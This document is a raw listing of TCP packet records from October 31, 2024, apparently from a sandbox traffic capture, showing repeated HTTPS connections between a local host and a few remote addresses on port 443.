Oct 31, 2024 19:20:28.605585098 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.633140087 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.635652065 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.637125015 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.637134075 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.640487909 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.640511990 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.641087055 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.641098022 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.641784906 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.641791105 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.732747078 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.732902050 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.732974052 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.733170033 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.733185053 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.733196020 CET	51388	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.733201981 CET	443	51388	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.736232996 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.736257076 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.736342907 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.736506939 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.736521006 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.741228104 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.741942883 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.741954088 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.742531061 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.742537022 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.764708042 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.764862061 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.764921904 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.765021086 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.765028954 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.765038013 CET	51390	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.765043974 CET	443	51390	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.767812967 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.767841101 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.767932892 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.768074989 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.768086910 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.772991896 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.773142099 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.773197889 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.773205996 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.773277998 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.773421049 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.773421049 CET	51389	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.773431063 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.773439884 CET	443	51389	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.776113987 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.776134968 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.776206017 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.776339054 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.776351929 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.870455027 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.870501995 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.870553970 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.870611906 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.870879889 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.870980024 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.870980024 CET	51391	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.870999098 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.871011019 CET	443	51391	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.874202967 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.874248981 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:28.874366999 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.874515057 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:28.874526978 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.299812078 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.300445080 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.300455093 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.301130056 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.301139116 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.427192926 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.427795887 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.427872896 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.427920103 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.427920103 CET	51392	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.427937031 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.427946091 CET	443	51392	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.431025982 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.431073904 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.431158066 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.431297064 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.431319952 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.455543041 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.456140995 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.456160069 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.456612110 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.456617117 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.494659901 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.495310068 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.495336056 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.495841980 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.495846033 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.502732038 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.503603935 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.503617048 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.504017115 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.504021883 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.583054066 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.583369970 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.583472967 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.583735943 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.583761930 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.583776951 CET	51393	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.583787918 CET	443	51393	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.586779118 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.586812019 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.587018013 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.587065935 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.587071896 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.631489038 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.631656885 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.631709099 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.631724119 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.631764889 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.631817102 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.631829977 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.631840944 CET	51395	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.631848097 CET	443	51395	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.634218931 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.634234905 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.634321928 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.634462118 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.634474993 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.634946108 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.635066986 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.635148048 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.635148048 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.635171890 CET	51394	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.635184050 CET	443	51394	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.637160063 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.637176991 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.637253046 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.637387991 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.637402058 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.642664909 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.643030882 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.643054008 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.643537045 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.643547058 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.779628038 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.780236959 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.780344009 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.780626059 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.780637026 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.780669928 CET	51396	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.780677080 CET	443	51396	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.783617973 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.783668041 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:29.783744097 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.785650015 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:29.785665989 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.171417952 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.171927929 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.171956062 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.172430992 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.172437906 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.301671982 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.301743984 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.301845074 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.301860094 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.301881075 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.302067995 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.305233002 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.310903072 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.310903072 CET	51397	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.310924053 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.310935020 CET	443	51397	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.339871883 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.339890957 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.343897104 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.343909025 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.370347977 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.375819921 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.375834942 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.376787901 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.382828951 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.382855892 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.399950027 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.399970055 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.406611919 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.406622887 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.418358088 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.418387890 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.418448925 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.418600082 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.418617010 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.469408989 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.469522953 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.469635963 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.485522985 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.485522985 CET	51398	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.485543013 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.485554934 CET	443	51398	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.490194082 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.490230083 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.490289927 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.490432978 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.490448952 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.506674051 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.506758928 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.506829023 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.507096052 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.507096052 CET	51399	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.507112980 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.507122040 CET	443	51399	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.510288954 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.510329008 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.510401011 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.510565996 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.510580063 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.514172077 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.514509916 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.514528036 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.515204906 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.515209913 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.532495975 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.532588959 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.532644033 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.532913923 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.532927036 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.532946110 CET	51400	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.532951117 CET	443	51400	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.537175894 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.537209988 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.537271976 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.537389040 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.537414074 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.643199921 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.643366098 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.643450022 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.643754005 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.643778086 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.643791914 CET	51401	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.643799067 CET	443	51401	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.646939039 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.646969080 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:30.647049904 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.647229910 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:30.647242069 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.148641109 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.149202108 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.149249077 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.149736881 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.149744034 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.248869896 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.249702930 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.249720097 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.250309944 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.250314951 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.254576921 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.254961967 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.254981995 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.255369902 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.255377054 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.264606953 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.264972925 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.264992952 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.265310049 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.265316963 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.276206017 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.276267052 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.276315928 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.276540041 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.276555061 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.276571989 CET	51402	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.276577950 CET	443	51402	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.279630899 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.279664040 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.279732943 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.279892921 CET	51407	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.279908895 CET	443	51407	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.370212078 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.370724916 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.370752096 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.371165037 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.371170044 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.383339882 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.383466005 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.383528948 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.383676052 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.383693933 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.383707047 CET	51403	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.383713007 CET	443	51403	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.387156010 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.387335062 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.387386084 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388439894 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388464928 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.388550997 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388624907 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388641119 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.388653040 CET	51404	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388659000 CET	443	51404	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.388768911 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.388782978 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.392678022 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.392719030 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.392744064 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.392777920 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.392786980 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.392831087 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.392833948 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.392880917 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.393449068 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.393467903 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.393573046 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.393573046 CET	51405	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.393584967 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.393594980 CET	443	51405	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.395768881 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.395777941 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.395836115 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.395927906 CET	51410	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.395941973 CET	443	51410	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.499792099 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.499895096 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.499959946 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.500237942 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.500257015 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.500267982 CET	51406	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.500273943 CET	443	51406	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.503741980 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.503792048 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:31.503865004 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.504273891 CET	51411	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:31.504290104 CET	443	51411	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.158318996 CET	51248	443	192.168.2.4	142.250.186.33
Oct 31, 2024 19:20:32.158358097 CET	443	51248	142.250.186.33	192.168.2.4
Oct 31, 2024 19:20:32.288368940 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.289024115 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.289076090 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.289112091 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.289307117 CET	51409	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.289344072 CET	443	51409	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.289614916 CET	51408	443	192.168.2.4	13.107.246.45
Oct 31, 2024 19:20:32.289619923 CET	443	51408	13.107.246.45	192.168.2.4
Oct 31, 2024 19:20:32.289788008 CET	51409	443	192.168.2.4	13.107.246.45
